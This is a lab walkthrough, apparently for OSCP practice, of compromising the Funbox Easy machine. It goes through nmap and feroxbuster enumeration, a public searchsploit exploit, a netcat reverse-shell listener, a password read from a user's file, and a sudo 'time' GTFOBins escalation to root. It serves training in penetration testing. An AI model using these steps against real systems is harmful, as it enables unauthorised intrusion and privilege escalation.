Preparing for OSCP | Sharing Practical Labs & Real-World Attack Analysis
Funbox Easy โ Web Exploit to GTFOBins Privilege Escalation
Today's machine demonstrated how vulnerable web applications combined with weak privilege configurations can lead to full system compromise.
๐ Step 1: Initial Enumeration
Started with aggressive Nmap scan:
nmap -sCV -A โ min-rate 1000 192.168.xx.xx
Explanation:
- -sC โ Default scripts
- -sV โ Service version detection
- -A โ OS detection + aggressive scan
- โ min-rate 1000 โ Faster scanning

Findings:
โ Port 80 open โ Web server running

๐ Step 2: Directory Brute Force
Performed directory enumeration:
feroxbuster โ url http://192.168.xx.xx

To discover hidden directories and endpoints.
Result:
โ Found /store directory โ Identified application: CSE Bookstore Online

๐ฅ Step 3: Searching for Exploit
Searched exploit database:
searchsploit cse bookstore online

Found a working public exploit.
Downloaded exploit:
searchsploit -m <exploit_id>

Download and run exploit

๐ Step 4: Reverse Shell Execution
Started listener on attacker machine:

Started listener on attacker machine:
nc -lnvp 1234

Modified exploit to include reverse shell payload.
Executed exploit โ Reverse shell received successfully.
Upgraded shell:
python3 -c 'import pty; pty.spawn("/bin/bash")'
๐ Step 5: Post Exploitation
While enumerating system users:
Discovered user: tony
Found password file inside tony's directory:
cat password.txt

Used discovered password to switch user:
su tony
Successfully accessed tony account.

โก Step 6: Privilege Escalation (GTFOBins โ time)
Enumerated sudo permissions:
sudo -l

Observed that time binary could be executed with sudo.
Checked GTFOBins for time.

Used:
sudo /usr/bin/time /bin/sh

If a binary is allowed via sudo and supports command execution, it can spawn a shell with root privileges.
๐ฅ Full Practical Demonstration For a complete step-by-step video walkthrough, watch here:
๐ Result
โ Web exploitation โ Reverse shell access โ Credential discovery โ User pivot to tony โ GTFOBins privilege escalation โ Root shell obtained